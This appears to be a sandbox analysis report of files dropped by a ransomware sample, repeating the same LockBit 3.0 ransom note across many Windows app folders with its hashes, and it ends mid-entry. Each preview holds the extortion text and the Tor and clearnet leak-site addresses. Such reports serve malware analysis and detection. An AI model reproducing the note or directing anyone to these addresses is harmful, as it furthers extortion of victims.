                C:\Users\user\AppData\Local\Packages\Microsoft.Print3D_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Print3D_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Print3D_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Print3D_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Print3D_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Print3D_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Print3D_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Print3D_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.977908977767401
                Encrypted:false
                SSDEEP:192:DD2kcVckduXm9Hlcnb+bPhkYoMpKJwJySU12zo:NcVckduCAbcFXy6Wl
                MD5:B7BCDE1AD454ECCEEEE2972372514069
                SHA1:7C05316C1A21865A78D8C12F2E505526416DA915
                SHA-256:5278F7ED5F35C0EC5EFBB0D337847D1028AC09DC276363B3393C962FA832DC26
                SHA-512:B4C613D601E46E2BB2CDF91EB0CB9C0C1334C9F41525ABD8E4C0FE263385E6C575656CA49CE15D52B4ACE828E683F7FAC27342169520B719F4725563F8015F8E
                Malicious:false
                Preview:..f:T..,.J.; .*.N?Eu....@.:S..y.z.Uc=*B......}.~m..>6B...|...Xrz.[>..e&M../.S...W.n..Eg..7(....s.....n.8+.....0..NzI..I.L..YB.....a$......Z.!..zA.(..*{J>.....}......d..?...xP.L...c..t...Z......M....%.'n..w4...D..F{?.{.k..h<.Q.6.....4.l..kh..*.....10w%...*.gS.zj.SR../...4[JD.$..a1........-^....-..J1..qFf..e.Ge&U..pg ...o..9Z.....b4...-.....p...<..F......y...&*'....H..;....W..)u.CiGx.|...x.....Z.)Q.......w...{.?..N.wu..|;..W.[.8.y.Q...gvP..K......#.. .....M.......]..6.O.....Z...+T.W.$'L.RxR......+......d.~.W..G....I....q......De...?l....>d.......&...../l..H..) .!1q.e....c..........).....i...U.....7Gi .9/..8....'...s.r.A....v....d..O....Y.......2..6..U*...Y%.K.5%.zS....V..l.3@.A.b....4.5.....Qp..L_....X../.q.....S'..)vU.i..y_..Q.PZ...A84.........Z.jy(..0...G....'d.}.R!........Sz.$..y.*.d....l.u1F._!^..~..=.3...2 .j..3.3....(.6.$.\3.[...R.LoO.hZ..2Im..~.y....._.'..M.....2......96...T.Y....u.....?.\.[4.>....B=.Sk.0.%......>.....7v......dZ.

                C:\Users\user\AppData\Local\Packages\Microsoft.Print3D_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Print3D_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Print3D_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Services.Store.Engagement_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Services.Store.Engagement_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Services.Store.Engagement_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal 